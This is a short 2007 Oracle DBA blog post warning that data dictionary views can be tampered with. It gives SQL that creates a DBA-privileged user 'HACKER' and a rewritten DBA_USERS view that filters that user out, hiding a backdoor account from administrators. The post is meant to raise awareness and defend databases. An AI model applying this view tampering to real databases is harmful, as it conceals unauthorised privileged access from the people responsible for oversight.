Coskan’s Approach to Oracle

January 29, 2007

What if DBA views are not reliable ??

Filed under: Security — coskan @ 12:13 pm

Suppose that you are the DBA of big Corporate with many DB users.

One day you query the v$session table and you see a username HACKER.

who is this ????

firts you look to toad and see nothing about user HACKER

than you query dba_users

and you see nothing about user HACKER

Where this user come from ??? Why you cant see him ??

Answer is below.
13:04:40 SQL> create user hacker identified by hacker;

User created.

13:05:50 SQL> grant create session to hacker;

Grant succeeded.

13:05:58 SQL> grant dba to hacker;

Grant succeeded.

13:12:33 SQL> select username from dba_users where username=’HACKER';

no rows selected

but

13:14:23 SQL> select name from user$ where name = ‘HACKER';

NAME
——————————
HACKER

1 row selected.

The answer can be read between the lines

CREATE OR REPLACE VIEW DBA_USERS
(USERNAME, USER_ID, PASSWORD, ACCOUNT_STATUS, LOCK_DATE, EXPIRY_DATE,
DEFAULT_TABLESPACE, TEMPORARY_TABLESPACE, CREATED, PROFILE,
INITIAL_RSRC_CONSUMER_GROUP, EXTERNAL_NAME)
AS
select u.name, u.user#, u.password, m.status,
decode(u.astatus, 4, u.ltime, 5, u.ltime, 6, u.ltime,
8, u.ltime,9, u.ltime, 10, u.ltime, to_date(NULL)),
decode(u.astatus, 1, u.exptime, 2, u.exptime, 5, u.exptime,
6, u.exptime, 9, u.exptime, 10, u.exptime,
decode(u.ptime, ”, to_date(NULL),
decode(pr.limit#, 2147483647, to_date(NULL),
decode(pr.limit#, 0,
decode(dp.limit#, 2147483647, to_date(NULL), u.ptime +
dp.limit#/86400),
u.ptime + pr.limit#/86400)))),
dts.name, tts.name, u.ctime, p.name,
nvl(cgm.consumer_group, ‘DEFAULT_CONSUMER_GROUP’),
u.ext_username
from sys.user$ u left outer join sys.resource_group_mapping$ cgm
on (cgm.attribute = ‘ORACLE_USER’ and cgm.status = ‘ACTIVE’ and
cgm.value = u.name),
sys.ts$ dts, sys.ts$ tts, sys.profname$ p,
sys.user_astatus_map m, sys.profile$ pr, sys.profile$ dp
where u.datats# = dts.ts#
and u.resource$ = p.profile#
and u.tempts# = tts.ts#
and u.astatus = m.status#
and u.type# = 1
and u.resource$ = pr.profile#
and dp.profile# = 0
and dp.type#=1
and dp.resource#=1
and pr.type# = 1
and pr.resource# = 1
and u.name <> ‘HACKER’

Thanks Steve Callan, for informing us about the situation above.

http://www.dbasupport.com/oracle/ora10g/hackers.shtml

What i have learned today;

If you want to be a real dba look behind the VIEWS.

Security Comes First

Security First

About these ads

Leave a Comment »

No comments yet.

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Silver is the New Black Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 199 other followers

%d bloggers like this: